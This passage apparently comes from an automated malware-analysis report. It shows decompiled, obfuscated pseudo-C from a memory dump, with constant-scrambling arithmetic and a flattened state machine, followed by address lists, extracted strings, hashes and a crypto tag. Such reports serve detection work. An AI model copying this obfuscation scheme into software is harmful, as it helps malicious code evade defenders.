				intOrPtr _v2608;
				intOrPtr _v2612;
				char _v2616;
				intOrPtr _v2620;
				char _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				unsigned int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				void* _t736;
				void* _t737;
				signed int _t740;
				signed int _t753;
				signed int _t758;
				signed int _t767;
				void* _t770;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				void* _t800;
				signed int _t865;
				void* _t867;
				void* _t871;
				signed int* _t872;
				void* _t879;

				_t872 =  &_v2908;
				_t871 = __ecx;
				_v2748 = 0x6c55d3;
				_v2748 = _v2748 >> 1;
				_v2748 = _v2748 >> 0xb;
				_v2748 = _v2748 ^ 0x000006ec;
				_v2908 = 0x669a6b;
				_v2908 = _v2908 + 0x60dd;
				_v2908 = _v2908 ^ 0xf314b8f3;
				_v2908 = _v2908 + 0x97ba;
				_v2908 = _v2908 ^ 0xf362db75;
				_v2700 = 0x5c6a63;
				_v2700 = _v2700 << 5;
				_v2700 = _v2700 ^ 0x0b8e02f9;
				_v2740 = 0x37e3c8;
				_v2740 = _v2740 >> 7;
				_v2740 = _v2740 << 9;
				_v2740 = _v2740 ^ 0x00d47583;
				_v2840 = 0xf3cbbb;
				_v2840 = _v2840 | 0x596ff34e;
				_v2840 = _v2840 >> 0xd;
				_v2840 = _v2840 ^ 0x13ea42fb;
				_v2840 = _v2840 ^ 0x13ec739c;
				_v2756 = 0xc4001a;
				_v2756 = _v2756 + 0xffff1bce;
				_v2756 = _v2756 * 0x48;
				_v2756 = _v2756 ^ 0x36d51a4a;
				_t867 = 0xafe47c9;
				_v2848 = 0x42cf80;
				_v2848 = _v2848 + 0xc4c2;
				_v2848 = _v2848 | 0xae71e6bc;
				_v2848 = _v2848 >> 6;
				_v2848 = _v2848 ^ 0x02b78186;
				_v2904 = 0xf2a051;
				_v2904 = _v2904 << 4;
				_t772 = 0x45;
				_v2904 = _v2904 * 0x22;
				_v2904 = _v2904 >> 0xf;
				_v2904 = _v2904 ^ 0x0008a543;
				_v2644 = 0x11767f;
				_v2644 = _v2644 << 7;
				_v2644 = _v2644 ^ 0x08bf1fd8;
				_v2796 = 0xeb2319;
				_v2796 = _v2796 ^ 0x10646992;
				_v2796 = _v2796 ^ 0xe48c962b;
				_v2796 = _v2796 ^ 0xf40ec857;
				_v2660 = 0xec0fc9;
				_v2660 = _v2660 | 0x04a00c6e;
				_v2660 = _v2660 ^ 0x04e4c565;
				_v2712 = 0x53e436;
				_t81 =  &_v2712; // 0x53e436
				_v2712 =  *_t81 / _t772;
				_v2712 = _v2712 ^ 0x000d4ef0;
				_v2636 = 0xec833b;
				_t773 = 0x26;
				_v2636 = _v2636 / _t773;
				_v2636 = _v2636 ^ 0x000a61c4;
				_v2780 = 0xa44196;
				_v2780 = _v2780 + 0xffffbdcf;
				_v2780 = _v2780 * 0x48;
				_v2780 = _v2780 ^ 0x2e12e538;
				_v2812 = 0xd2f08f;
				_v2812 = _v2812 ^ 0x6cda5d95;
				_v2812 = _v2812 + 0xcbff;
				_v2812 = _v2812 ^ 0x6c0d698b;
				_v2696 = 0xce726d;
				_v2696 = _v2696 >> 0xc;
				_v2696 = _v2696 ^ 0x0004b397;
				_v2704 = 0xe26a2a;
				_t118 =  &_v2704; // 0xe26a2a
				_t774 = 0x1f;
				_v2704 =  *_t118 / _t774;
				_v2704 = _v2704 ^ 0x0001354f;
				_v2880 = 0x89ddcc;
				_v2880 = _v2880 >> 0x10;
				_v2880 = _v2880 << 2;
				_v2880 = _v2880 ^ 0x000b0180;
				_v2772 = 0x4dd4c8;
				_t865 = 0x66;
				_t775 = 0x57;
				_v2772 = _v2772 * 0x34;
				_v2772 = _v2772 ^ 0x61e2e9d2;
				_v2772 = _v2772 ^ 0x6e2efb6d;
				_v2888 = 0x2a10bd;
				_v2888 = _v2888 << 0xb;
				_v2888 = _v2888 * 6;
				_v2888 = _v2888 / _t865;
				_v2888 = _v2888 ^ 0x0232595d;
				_v2896 = 0x40e7bf;
				_v2896 = _v2896 << 8;
				_v2896 = _v2896 * 0x4b;
				_v2896 = _v2896 + 0xb19d;
				_v2896 = _v2896 ^ 0x03ee0d88;
				_v2680 = 0x771317;
				_v2680 = _v2680 << 5;
				_v2680 = _v2680 ^ 0x0eead1f9;
				_v2688 = 0xd8175;
				_v2688 = _v2688 + 0xffff5bb2;
				_v2688 = _v2688 ^ 0x00022f84;
				_v2872 = 0xaa4c37;
				_v2872 = _v2872 << 0xc;
				_v2872 = _v2872 * 0xa;
				_v2872 = _v2872 ^ 0x5f2fa35b;
				_v2872 = _v2872 ^ 0x3089e4c3;
				_v2672 = 0xc4b752;
				_v2672 = _v2672 >> 7;
				_v2672 = _v2672 ^ 0x000c634b;
				_v2856 = 0xaefea9;
				_v2856 = _v2856 | 0xecc79e98;
				_v2856 = _v2856 + 0xffff81e8;
				_v2856 = _v2856 | 0x12972ae7;
				_v2856 = _v2856 ^ 0xfef9168d;
				_v2864 = 0x709a59;
				_v2864 = _v2864 / _t775;
				_v2864 = _v2864 + 0xffff8235;
				_v2864 = _v2864 + 0xeeba;
				_v2864 = _v2864 ^ 0x0005c754;
				_v2764 = 0xb32c16;
				_v2764 = _v2764 + 0xfffff755;
				_v2764 = _v2764 >> 5;
				_v2764 = _v2764 ^ 0x000dc340;
				_v2632 = 0xf81b9e;
				_v2632 = _v2632 + 0x1d69;
				_v2632 = _v2632 ^ 0x00f4c387;
				_v2784 = 0x9925a5;
				_v2784 = _v2784 + 0x3c11;
				_v2784 = _v2784 >> 7;
				_v2784 = _v2784 ^ 0x00045da3;
				_v2776 = 0xb2aa5c;
				_v2776 = _v2776 * 0x1a;
				_v2776 = _v2776 * 0x79;
				_v2776 = _v2776 ^ 0x93abc7b1;
				_v2828 = 0x7fc716;
				_t776 = 0x5f;
				_v2828 = _v2828 * 0x71;
				_v2828 = _v2828 | 0xfe8320a4;
				_v2828 = _v2828 + 0x165d;
				_v2828 = _v2828 ^ 0xfeed06b3;
				_v2752 = 0xb2532d;
				_v2752 = _v2752 + 0xffff80c5;
				_v2752 = _v2752 << 0xe;
				_v2752 = _v2752 ^ 0x74f37b49;
				_v2676 = 0xa71bf2;
				_v2676 = _v2676 >> 0xf;
				_v2676 = _v2676 ^ 0x000357d4;
				_v2768 = 0xb707c5;
				_v2768 = _v2768 + 0x6c17;
				_v2768 = _v2768 + 0xffff6665;
				_v2768 = _v2768 ^ 0x00bd5d77;
				_v2640 = 0xc69e9;
				_v2640 = _v2640 * 0x6d;
				_v2640 = _v2640 ^ 0x054207cf;
				_v2736 = 0xa2288d;
				_v2736 = _v2736 / _t776;
				_t777 = 0x2c;
				_v2736 = _v2736 * 0x5f;
				_v2736 = _v2736 ^ 0x00a4e59e;
				_v2684 = 0xea946c;
				_v2684 = _v2684 / _t777;
				_v2684 = _v2684 ^ 0x000e1f1e;
				_v2720 = 0xb517d8;
				_v2720 = _v2720 >> 0x10;
				_v2720 = _v2720 ^ 0x000f0ff9;
				_v2732 = 0xefc27d;
				_v2732 = _v2732 << 2;
				_t778 = 7;
				_v2732 = _v2732 / _t778;
				_v2732 = _v2732 ^ 0x00855635;
				_v2664 = 0xba3d7;
				_v2664 = _v2664 ^ 0x374644f1;
				_v2664 = _v2664 ^ 0x374cf327;
				_v2836 = 0xdd8c69;
				_v2836 = _v2836 + 0xc1fa;
				_v2836 = _v2836 + 0x8f6f;
				_v2836 = _v2836 >> 3;
				_v2836 = _v2836 ^ 0x001d4985;
				_v2900 = 0x104b58;
				_v2900 = _v2900 * 0x57;
				_v2900 = _v2900 >> 0x10;
				_v2900 = _v2900 + 0x6bca;
				_v2900 = _v2900 ^ 0x00002998;
				_v2852 = 0x9c77cc;
				_v2852 = _v2852 >> 0x10;
				_v2852 = _v2852 + 0xffff6577;
				_v2852 = _v2852 * 5;
				_v2852 = _v2852 ^ 0xffff046f;
				_v2892 = 0xe182e3;
				_v2892 = _v2892 | 0xd88343ed;
				_v2892 = _v2892 + 0xffff0ff1;
				_v2892 = _v2892 + 0xffff0dce;
				_v2892 = _v2892 ^ 0xd8eb7448;
				_v2800 = 0x85db22;
				_v2800 = _v2800 * 0x50;
				_t779 = 0x27;
				_v2800 = _v2800 * 0x48;
				_v2800 = _v2800 ^ 0xc3ccfa33;
				_v2788 = 0x4ce847;
				_t354 =  &_v2788; // 0x4ce847
				_v2788 =  *_t354 / _t779;
				_v2788 = _v2788 + 0xbbbd;
				_v2788 = _v2788 ^ 0x000da432;
				_v2716 = 0xff95f7;
				_v2716 = _v2716 + 0xffff65bb;
				_v2716 = _v2716 ^ 0x00fe0059;
				_v2876 = 0x1a5ef3;
				_t780 = 0x4e;
				_v2876 = _v2876 * 0x2c;
				_v2876 = _v2876 + 0x52ab;
				_v2876 = _v2876 << 7;
				_v2876 = _v2876 ^ 0x4456aa7e;
				_v2820 = 0xc27750;
				_v2820 = _v2820 + 0xfdb4;
				_v2820 = _v2820 + 0x442f;
				_v2820 = _v2820 + 0x2d94;
				_v2820 = _v2820 ^ 0x00c83ffb;
				_v2884 = 0x93686d;
				_v2884 = _v2884 / _t780;
				_t781 = 0x47;
				_v2884 = _v2884 / _t781;
				_t782 = 0x48;
				_v2884 = _v2884 / _t782;
				_v2884 = _v2884 ^ 0x000590fc;
				_v2804 = 0x8bc272;
				_v2804 = _v2804 << 0xc;
				_v2804 = _v2804 >> 5;
				_v2804 = _v2804 ^ 0x05e374be;
				_v2792 = 0xf2db83;
				_t783 = 0x23;
				_v2792 = _v2792 / _t783;
				_v2792 = _v2792 + 0xffff9c66;
				_v2792 = _v2792 ^ 0x000e3f1b;
				_v2628 = 0xc1bd17;
				_t784 = 0x13;
				_v2628 = _v2628 / _t784;
				_v2628 = _v2628 ^ 0x000fd62a;
				_v2760 = 0x9d4239;
				_t785 = 0x43;
				_v2760 = _v2760 / _t785;
				_v2760 = _v2760 >> 3;
				_v2760 = _v2760 ^ 0x000d6406;
				_v2860 = 0x2ea4c0;
				_v2860 = _v2860 + 0xffff4216;
				_v2860 = _v2860 * 0x76;
				_v2860 = _v2860 + 0xffffb755;
				_v2860 = _v2860 ^ 0x1520e5b0;
				_v2652 = 0xfb889;
				_t786 = 0x71;
				_v2652 = _v2652 / _t786;
				_v2652 = _v2652 ^ 0x000b1927;
				_v2708 = 0x2b7622;
				_t787 = 0x3c;
				_v2708 = _v2708 * 0x58;
				_v2708 = _v2708 ^ 0x0ef6d7f2;
				_v2656 = 0x35a87f;
				_v2656 = _v2656 / _t787;
				_v2656 = _v2656 ^ 0x000a2d9e;
				_v2668 = 0xe7c9a1;
				_v2668 = _v2668 << 8;
				_v2668 = _v2668 ^ 0xe7cfe750;
				_v2648 = 0x30c598;
				_v2648 = _v2648 | 0x42c92a85;
				_v2648 = _v2648 ^ 0x42f3db49;
				_v2808 = 0x727f27;
				_v2808 = _v2808 + 0xffff3ed3;
				_v2808 = _v2808 >> 1;
				_v2808 = _v2808 ^ 0x00399fa4;
				_v2744 = 0x401c80;
				_v2744 = _v2744 | 0x342ce885;
				_v2744 = _v2744 << 2;
				_v2744 = _v2744 ^ 0xd1ba28e2;
				_v2868 = 0xac51e3;
				_v2868 = _v2868 << 8;
				_v2868 = _v2868 >> 0xb;
				_t788 = 0x56;
				_v2868 = _v2868 * 0x56;
				_v2868 = _v2868 ^ 0x073953df;
				_v2844 = 0x710633;
				_v2844 = _v2844 + 0x52d8;
				_v2844 = _v2844 + 0x6db8;
				_v2844 = _v2844 >> 0x10;
				_v2844 = _v2844 ^ 0x0002214d;
				_v2692 = 0x4fef05;
				_v2692 = _v2692 >> 0xd;
				_v2692 = _v2692 ^ 0x000e02be;
				_v2728 = 0x940206;
				_v2728 = _v2728 * 0x1b;
				_v2728 = _v2728 ^ 0xcf3123bf;
				_v2728 = _v2728 ^ 0xc0a196d4;
				_v2724 = 0x330d98;
				_v2724 = _v2724 / _t865;
				_v2724 = _v2724 + 0x4da;
				_v2724 = _v2724 ^ 0x000b3b06;
				_v2816 = 0xe1a084;
				_v2816 = _v2816 + 0xffffa932;
				_v2816 = _v2816 << 3;
				_v2816 = _v2816 << 0xa;
				_v2816 = _v2816 ^ 0x293f1ebb;
				_v2824 = 0x8a2e6b;
				_v2824 = _v2824 | 0x96271981;
				_v2824 = _v2824 ^ 0x7782ca65;
				_t789 = 0x7b;
				_v2824 = _v2824 / _t788;
				_v2824 = _v2824 ^ 0x029e7e06;
				_v2832 = 0x394eeb;
				_v2832 = _v2832 / _t789;
				_v2832 = _v2832 + 0xffffb3cc;
				_v2832 = _v2832 >> 9;
				_v2832 = _v2832 ^ 0x000c65aa;
				_t736 = E100118AD();
				_t866 = _v2720;
				_t770 = _t736;
				while(1) {
					L1:
					_t737 = 0x5b8b4d0;
					do {
						while(1) {
							L2:
							_t879 = _t867 - 0x6cc892b;
							if(_t879 > 0) {
								break;
							}
							if(_t879 == 0) {
								_v2612 = E10003FA7();
								_t758 = E100047C5(_v2776, _v2752, _t757);
								_pop(_t800);
								_v2608 = 2 + _t758 * 2;
								_t789 =  &_v2616;
								_t753 = E10017F2F(_t789, _t800, _t770, _v2676, _v2768, _t770, _v2908, _t770, _v2640, _v2736, _v2684);
								_t872 =  &(_t872[0xa]);
								__eflags = _t753;
								if(__eflags != 0) {
									_t867 = 0x7cfe470;
									while(1) {
										L1:
										_t737 = 0x5b8b4d0;
										goto L2;
									}
								}
							} else {
								if(_t867 == 0x139f8a9) {
									return E100074B2(_v2724, _v2816, _v2824, _v2616, _v2832);
								}
								if(_t867 == 0x5a85c29) {
									_t789 = _v2868;
									E100088FC(_t789, _v2844, _v2692, _v2728, _v2624);
									_t872 =  &(_t872[3]);
									_t867 = 0x139f8a9;
									while(1) {
										L1:
										_t737 = 0x5b8b4d0;
										goto L2;
									}
								} else {
									if(_t867 == _t737) {
										_push(_v2788);
										_push(_v2800);
										_push(_v2892);
										E1000AD89(_v2716, _v2876, _v2820, _v2884, _t866, _v2852,  &_v1564, E1000416C(_v2852, 0x10001794),  &_v524, _v2804);
										_t872 =  &(_t872[0xc]);
										E1000B952(_v2792, _t762, _v2628, _v2760);
										_pop(_t789);
										_t867 = 0x64848a9;
										while(1) {
											L1:
											_t737 = 0x5b8b4d0;
											goto L2;
										}
									} else {
										if(_t867 == 0x62a5bc4) {
											_t767 = E10013B36(_v2836, _v2900, _v2620, _v2624);
											_t866 = _t767;
											__eflags = _t767;
											_t737 = 0x5b8b4d0;
											_pop(_t789);
											_t867 =  !=  ? 0x5b8b4d0 : 0x5a85c29;
											continue;
										} else {
											_t884 = _t867 - 0x64848a9;
											if(_t867 != 0x64848a9) {
												goto L26;
											} else {
												_push(_v2656);
												_push( &_v1564);
												_push(_t789);
												_push(0);
												_push(_v2708);
												_push(_v2652);
												_t789 = 1;
												_push(_v2860);
												E1000D1FD(1, 0, _t884);
												_t872 =  &(_t872[7]);
												_t867 = 0xd334897;
												while(1) {
													L1:
													_t737 = 0x5b8b4d0;
													goto L2;
												}
											}
										}
									}
								}
								L30:
							}
							L29:
							return _t753;
							goto L30;
						}
						__eflags = _t867 - 0x7cfe470;
						if(_t867 == 0x7cfe470) {
							_t789 = _v2720;
							_t740 = E1000D8F0(_v2732,  &_v2624, _v2664,  &_v2616);
							_t872 =  &(_t872[3]);
							__eflags = _t740;
							if(__eflags == 0) {
								_t867 = 0x139f8a9;
								_t737 = 0x5b8b4d0;
								goto L26;
							} else {
								_t867 = 0x62a5bc4;
								goto L1;
							}
							goto L30;
						} else {
							__eflags = _t867 - 0xafe47c9;
							if(_t867 == 0xafe47c9) {
								_push(_t789);
								_t789 = _v2740;
								E1000441F(_t789, _v2748, _v2840, _v2756,  &_v524, _t789, _v2848);
								_t872 =  &(_t872[7]);
								_t867 = 0xd1b3656;
								while(1) {
									L1:
									_t737 = 0x5b8b4d0;
									goto L2;
								}
							} else {
								__eflags = _t867 - 0xd1b3656;
								if(__eflags == 0) {
									E1001E780(_v2904, __eflags, _v2644,  &_v2084);
									 *((short*)(E10001A5C( &_v2084, _v2796, _v2660))) = 0;
									E1001215E(_v2712, _v2636, __eflags,  &_v1044);
									_push(_v2704);
									_push(_v2696);
									_push(_v2812);
									E100049CE( &_v2084,  &_v1044, E1000416C(_v2780, 0x10001684), _v2880, _v2772, _v2780, _v2888, _v2896);
									E1000B952(_v2680, _t748, _v2688, _v2872);
									_t789 = _v2672;
									_t753 = E1001C962(_t789, _v2856, _t871, _v2864, _v2764,  &_v2604);
									_t872 =  &(_t872[0x13]);
									__eflags = _t753;
									if(__eflags != 0) {
										_t867 = 0x6cc892b;
										while(1) {
											L1:
											_t737 = 0x5b8b4d0;
											goto L2;
										}
									}
								} else {
									__eflags = _t867 - 0xd334897;
									if(_t867 != 0xd334897) {
										goto L26;
									} else {
										_t789 = _v2668;
										E100088FC(_t789, _v2648, _v2808, _v2744, _t866);
										_t872 =  &(_t872[3]);
										_t867 = 0x5a85c29;
										while(1) {
											L1:
											_t737 = 0x5b8b4d0;
											goto L2;
										}
									}
									goto L30;
								}
							}
						}
						goto L29;
						L26:
						__eflags = _t867 - 0xd0721ff;
					} while (__eflags != 0);
					return _t737;
				}
			}

0x10013ff3
0x10013ffd
0x10013fff
0x1001400c
0x10014013
0x1001401b
0x10014026
0x1001402e
0x10014036
0x1001403e
0x10014046
0x1001404e
0x10014059
0x10014061
0x1001406c
0x10014077
0x1001407f
0x10014087
0x10014092
0x1001409a
0x100140a2
0x100140a7
0x100140af
0x100140b7
0x100140c2
0x100140d5
0x100140dc
0x100140e7
0x100140ec
0x100140f4
0x100140fc
0x10014104
0x10014109
0x10014111
0x10014119
0x10014125
0x10014128
0x1001412c
0x10014131
0x10014139
0x10014144
0x1001414c
0x10014157
0x10014162
0x1001416d
0x10014178
0x10014183
0x1001418e
0x10014199
0x100141a4
0x100141af
0x100141ba
0x100141c1
0x100141cc
0x100141de
0x100141e1
0x100141e8
0x100141f3
0x100141fe
0x10014211
0x10014218
0x10014223
0x1001422b
0x10014233
0x1001423b
0x10014243
0x1001424e
0x10014256
0x10014261
0x1001426e
0x10014277
0x1001427c
0x10014285
0x10014290
0x100142a0
0x100142a5
0x100142aa
0x100142b2
0x100142c5
0x100142c8
0x100142c9
0x100142d0
0x100142db
0x100142e6
0x100142ee
0x100142f8
0x10014304
0x10014308
0x10014310
0x10014318
0x10014322
0x10014326
0x1001432e
0x10014336
0x10014341
0x10014349
0x10014354
0x1001435f
0x1001436a
0x10014375
0x1001437d
0x10014387
0x1001438b
0x10014393
0x1001439b
0x100143a6
0x100143ae
0x100143b9
0x100143c1
0x100143c9
0x100143d1
0x100143d9
0x100143e1
0x100143ef
0x100143f3
0x100143fb
0x10014403
0x1001440b
0x10014416
0x10014421
0x10014429
0x10014434
0x1001443f
0x1001444a
0x10014455
0x10014460
0x1001446b
0x10014473
0x1001447e
0x10014491
0x100144a0
0x100144a9
0x100144b4
0x100144c3
0x100144c6
0x100144ca
0x100144d2
0x100144da
0x100144e2
0x100144ed
0x100144f8
0x10014500
0x1001450b
0x10014516
0x1001451e
0x10014529
0x10014534
0x1001453f
0x1001454a
0x10014555
0x10014568
0x1001456f
0x1001457a
0x10014590
0x1001459f
0x100145a2
0x100145a9
0x100145b4
0x100145ca
0x100145d1
0x100145dc
0x100145e7
0x100145ef
0x100145fa
0x10014605
0x10014614
0x10014617
0x1001461e
0x10014629
0x10014634
0x1001463f
0x1001464a
0x10014652
0x1001465a
0x10014662
0x10014667
0x1001466f
0x1001467c
0x10014680
0x10014685
0x1001468d
0x10014695
0x1001469d
0x100146a2
0x100146af
0x100146b3
0x100146bb
0x100146c3
0x100146cb
0x100146d3
0x100146db
0x100146e3
0x100146f0
0x100146fd
0x10014700
0x10014707
0x10014712
0x1001471d
0x10014728
0x1001472f
0x1001473a
0x10014745
0x10014750
0x1001475b
0x10014766
0x10014773
0x10014776
0x1001477a
0x10014782
0x10014787
0x1001478f
0x10014797
0x1001479f
0x100147a7
0x100147af
0x100147b7
0x100147c7
0x100147cf
0x100147d4
0x100147de
0x100147e3
0x100147e9
0x100147f1
0x100147f9
0x100147fe
0x10014803
0x1001480b
0x1001481d
0x10014822
0x1001482b
0x10014836
0x10014841
0x10014853
0x10014858
0x10014861
0x1001486c
0x1001487e
0x10014881
0x10014888
0x10014890
0x1001489b
0x100148a3
0x100148b0
0x100148b4
0x100148bc
0x100148c6
0x100148da
0x100148df
0x100148e8
0x100148f3
0x10014906
0x10014909
0x10014910
0x1001491b
0x10014931
0x10014938
0x10014943
0x1001494e
0x10014956
0x10014961
0x1001496c
0x10014977
0x10014982
0x1001498a
0x10014992
0x10014996
0x1001499e
0x100149a9
0x100149b4
0x100149bc
0x100149c7
0x100149cf
0x100149d4
0x100149de
0x100149e1
0x100149e5
0x100149ed
0x100149f5
0x100149fd
0x10014a05
0x10014a0a
0x10014a12
0x10014a1d
0x10014a25
0x10014a30
0x10014a43
0x10014a4a
0x10014a55
0x10014a60
0x10014a76
0x10014a7d
0x10014a88
0x10014a93
0x10014a9b
0x10014aa3
0x10014aa8
0x10014aad
0x10014ab5
0x10014abd
0x10014ac5
0x10014ad3
0x10014ad4
0x10014ad8
0x10014ae2
0x10014af0
0x10014af4
0x10014afc
0x10014b01
0x10014b10
0x10014b15
0x10014b1c
0x10014b1e
0x10014b1e
0x10014b1e
0x10014b23
0x10014b23
0x10014b23
0x10014b23
0x10014b29
0x00000000
0x00000000
0x10014b2f
0x10014cae
0x10014cb5
0x10014cbb
0x10014cd1
0x10014cf5
0x10014cfc
0x10014d01
0x10014d04
0x10014d06
0x10014d0c
0x10014b1e
0x10014b1e
0x10014b1e
0x00000000
0x10014b1e
0x10014b1e
0x10014b35
0x10014b3b
0x00000000
0x10014f1c
0x10014b47
0x10014c72
0x10014c76
0x10014c7b
0x10014c7e
0x10014b1e
0x10014b1e
0x10014b1e
0x00000000
0x10014b1e
0x10014b4d
0x10014b4f
0x10014bd0
0x10014bdc
0x10014be3
0x10014c29
0x10014c2e
0x10014c48
0x10014c4e
0x10014c4f
0x10014b1e
0x10014b1e
0x10014b1e
0x00000000
0x10014b1e
0x10014b51
0x10014b57
0x10014bb3
0x10014bb8
0x10014bbf
0x10014bc1
0x10014bc7
0x10014bc8
0x00000000
0x10014b59
0x10014b59
0x10014b5f
0x00000000
0x10014b65
0x10014b65
0x10014b75
0x10014b76
0x10014b77
0x10014b79
0x10014b82
0x10014b89
0x10014b8a
0x10014b8e
0x10014b93
0x10014b96
0x10014b1e
0x10014b1e
0x10014b1e
0x00000000
0x10014b1e
0x10014b1e
0x10014b5f
0x10014b57
0x10014b4f
0x00000000
0x10014b47
0x10014f29
0x10014f29
0x00000000
0x10014f29
0x10014d16
0x10014d1c
0x10014ec7
0x10014ecf
0x10014ed4
0x10014ed7
0x10014ed9
0x10014ee5
0x10014eea
0x00000000
0x10014edb
0x10014edb
0x00000000
0x10014edb
0x00000000
0x10014d22
0x10014d22
0x10014d28
0x10014e71
0x10014e91
0x10014e98
0x10014e9d
0x10014ea0
0x10014b1e
0x10014b1e
0x10014b1e
0x00000000
0x10014b1e
0x10014d2e
0x10014d2e
0x10014d34
0x10014d81
0x10014dac
0x10014dbe
0x10014dc4
0x10014dd0
0x10014dd7
0x10014e17
0x10014e33
0x10014e4f
0x10014e57
0x10014e5c
0x10014e5f
0x10014e61
0x10014e67
0x10014b1e
0x10014b1e
0x10014b1e
0x00000000
0x10014b1e
0x10014b1e
0x10014d36
0x10014d36
0x10014d3c
0x00000000
0x10014d42
0x10014d55
0x10014d5c
0x10014d61
0x10014d64
0x10014b1e
0x10014b1e
0x10014b1e
0x00000000
0x10014b1e
0x10014b1e
0x00000000
0x10014d3c
0x10014d34
0x10014d28
0x00000000
0x10014eef
0x10014eef
0x10014eef
0x00000000
0x10014b23

Strings

*j, xrefs: 1001426E
/D, xrefs: 1001479F
GL, xrefs: 1001471D
N9, xrefs: 10014AE2
cj\, xrefs: 1001404E
Y, xrefs: 1001475B
6S, xrefs: 100141AF

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: *j$/D$6S$GL$Y$cj\$N9
API String ID: 0-864003473
Opcode ID: b34cb9fa7acfc053cd660077f28dda86e7f0652cf37b96f34b2449f18f26a6ec
Instruction ID: e2cbc41149f730a7dc36a38e580d6e27ac23e3b0c174108eaf881a7bbddb61e8
Opcode Fuzzy Hash: b34cb9fa7acfc053cd660077f28dda86e7f0652cf37b96f34b2449f18f26a6ec
Instruction Fuzzy Hash: CE72F0B15093819FD378CF25C94AB8BBBE1FBC4308F10891DE6D99A260D7B59949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1000F217, Relevance: 9.2, Strings: 7, Instructions: 417
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1000F217() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				unsigned int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				void* _t468;
				void* _t469;
				intOrPtr* _t485;
				signed int _t490;
				intOrPtr* _t492;
				void* _t505;
				void* _t553;
				signed int* _t558;

				_t558 =  &_v1768;
				_v1576 = 0x58a06a;
				_v1568 = 0;
				_v1564 = 0;
				_v1572 = 0x8ab0cf;
				_v1728 = 0x5e025f;
				_v1728 = _v1728 >> 6;
				_v1728 = _v1728 << 0xd;
				_v1728 = _v1728 ^ 0xfb1ff69f;
				_v1728 = _v1728 ^ 0xd41ed6b6;
				_v1736 = 0x64d898;
				_v1736 = _v1736 ^ 0xe205207d;
				_push(0x6c);
				_v1584 = 0;
				_t553 = 0xdbf6f02;
				_push(0x5a);
				_v1736 = _v1736 / 0;
				_v1736 = _v1736 >> 2;
				_v1736 = _v1736 ^ 0x80862719;
				_v1764 = 0x5d8957;
				_push(0x41);
				_v1764 = _v1764 * 0x28;
				_v1764 = _v1764 >> 8;
				_v1764 = _v1764 << 0x10;
				_v1764 = _v1764 ^ 0x9d750002;
				_v1596 = 0x10a015;
				_v1596 = _v1596 * 0x1d;
				_v1596 = _v1596 ^ 0x01e22260;
				_v1752 = 0x19c48;
				_v1752 = _v1752 ^ 0x6e39f52b;
				_v1752 = _v1752 + 0xffff61f2;
				_v1752 = _v1752 / 0;
				_v1752 = _v1752 ^ 0x0137478b;
				_v1624 = 0xb5ff;
				_v1624 = _v1624 << 4;
				_v1624 = _v1624 ^ 0x00073e59;
				_v1760 = 0x2a66ee;
				_v1760 = _v1760 ^ 0x07182efb;
				_v1760 = _v1760 | 0x451190ae;
				_v1760 = _v1760 ^ 0xf00d96e5;
				_v1760 = _v1760 ^ 0xb7397358;
				_v1704 = 0xdf45d5;
				_v1704 = _v1704 * 3;
				_v1704 = _v1704 + 0x449d;
				_v1704 = _v1704 + 0xffff229f;
				_v1704 = _v1704 ^ 0x029981ab;
				_v1724 = 0x32cb21;
				_v1724 = _v1724 >> 4;
				_v1724 = _v1724 << 0xc;
				_v1724 = _v1724 | 0x31dff0c5;
				_v1724 = _v1724 ^ 0x33d1fd3e;
				_v1732 = 0x43d5a0;
				_v1732 = _v1732 >> 1;
				_v1732 = _v1732 / 0;
				_v1732 = _v1732 ^ 0x784a2dff;
